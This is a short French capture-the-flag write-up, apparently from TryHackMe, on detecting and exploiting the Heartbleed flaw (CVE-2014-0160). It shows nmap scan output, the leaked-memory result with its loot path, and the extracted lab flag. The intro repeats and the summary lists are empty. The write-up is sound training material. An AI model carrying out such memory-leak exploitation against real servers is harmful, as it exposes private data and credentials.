
L'objectif de ce projet était d'évaluer un hôte distant pour la vulnérabilité Heartbleed (CVE-2014-0160), de vérifier sa présence et de l'exploiter pour extraire des informations potentiellement sensibles de la mémoire du serveur via le protocole TLS.
L'objectif de ce projet était d'évaluer un hôte distant pour la vulnérabilité Heartbleed (CVE-2014-0160), de vérifier sa présence et de l'exploiter pour extraire des informations potentiellement sensibles de la mémoire du serveur via le protocole TLS.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
111/tcp open rpcbind 2-4
443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
Le certificat TLS était auto-signé et expiré. Cela a soulevé des soupçons sur le fait que la version d'OpenSSL pourrait être obsolète. Port cible : 443.
| ssl-heartbleed:
| VULNERABLE:
| OpenSSL 1.0.1 is vulnerable to Heartbleed
| State: VULNERABLE
| Risk factor: High
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
La cible est confirmée vulnérable à Heartbleed.
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
La mémoire a été déchargée avec succès et stockée localement pour analyse.
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
Des données confidentielles, y compris un flag applicatif, ont été extraites avec succès de la mémoire TLS — confirmant que la vulnérabilité peut être exploitée pratiquement pour divulguer des informations sensibles.
J'ai identifié et exploité avec succès CVE-2014-0160 sur un serveur distant. Le processus comprenait :
La présence de Heartbleed dans un système exposé publiquement pose un risque critique :